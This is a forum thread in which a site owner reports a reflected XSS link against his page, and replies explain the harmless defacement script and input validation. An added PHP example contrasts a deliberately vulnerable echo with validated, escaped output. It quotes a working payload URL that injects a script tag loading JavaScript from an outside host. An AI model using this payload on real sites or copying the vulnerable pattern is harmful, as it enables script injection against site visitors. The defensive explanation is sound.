aaricwon
Posted February 27, 2008

I am very new and have learned a lot from you guys. Thank you! I started working on www.bjjnews.org/TUF and posted it on the Beta Test forum, and someone replied to my post with this:

http://www.bjjnews.org/TUF/index.php?page=2%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E

redarrow
Posted February 27, 2008

You have not been hacked. All they did was add a URL to a forum and try to scare you. Child's play.

Here's their boring JavaScript code:

```javascript
// Runs once the page has loaded in the visitor's browser.
window.onload = function() {
    // Blank out the existing page body.
    var eles = document.getElementsByTagName('body');
    eles[0].innerHTML = '';

    // Build a styled box to hold the notice.
    var mainDiv = document.createElement('DIV');
    var mainStyle = "margin: 40px auto; width: 300px; border: 1px solid #000000; padding: 15px; background-color: #f4f4f4; font-family: 'Trebuchet MS', Arial, Verdana, sans-serif; font-size: 11px; color: #454545;";
    mainDiv.setAttribute('style', mainStyle);
    document.body.appendChild(mainDiv);

    // Fill the box with the notice text and change the window title.
    mainDiv.innerHTML = '<h1 style="font-family: Georgia, Helvetia, serif; color: #770000; font-size: 18px; font-weight: normal; margin: 5px 0 10px;">Vunerable - Potentially Pwned</h1><p>This is an example of XSS, you need to protect against this or your site could be completely and utterly pwned. <br> That is all! <br><br> Ciao!</p>';
    document.title = "This site has been pwned!";
};
```

awpti
Posted February 27, 2008

Input validation. Validate, validate and then validate some more. And then validate that it was validated. You can't validate user input enough.

Look it up, lots of topics covering PHP/Input Validation.
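
The validation advice above, applied to the `page` parameter from the link in the first post. This is an added example, not code from the thread or from the site: the function names, the 20-page limit and the sample inputs are assumptions, since the site's own index.php is not shown.

```php
<?php
// Added example. Hypothetical handlers for index.php?page=N.

// Vulnerable pattern: the raw parameter is echoed into the HTML, so any
// markup it carries (such as a <script src=...> tag) becomes part of the page.
function render_pager_vulnerable(string $page): string
{
    return '<a href="index.php?page=' . $page . '">Page ' . $page . '</a>';
}

// Validation: a page number is an integer in a known range, nothing else.
// Arrays (index.php?page[]=x), null and mixed strings all fail the filter.
function parse_page($raw, int $maxPage): int
{
    $page = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => $maxPage],
    ]);
    return $page === false ? 1 : $page;   // fall back to the first page
}

// Hardened: validate on input, escape on output.
function render_pager_safe($raw, int $maxPage): string
{
    $page = parse_page($raw, $maxPage);
    // Redundant for an int, but keeps one output rule for every value.
    $safe = htmlspecialchars((string) $page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="index.php?page=' . $safe . '">Page ' . $safe . '</a>';
}

// Constructed sample inputs, as PHP would present them in $_GET
// (already URL-decoded). The second one is the value from the thread.
$fromThread = '2<script src=http://www.helraizer.co.uk/xss1.js></script>';
$samples = ['2', $fromThread, '-5', '2 OR 1=1', ['nested' => 'array']];

echo "vulnerable: ", render_pager_vulnerable($fromThread), PHP_EOL, PHP_EOL;

foreach ($samples as $raw) {
    $shown = is_array($raw) ? '(array)' : $raw;
    echo "input:  ", $shown, PHP_EOL;
    echo "safe:   ", render_pager_safe($raw, 20), PHP_EOL, PHP_EOL;
}
```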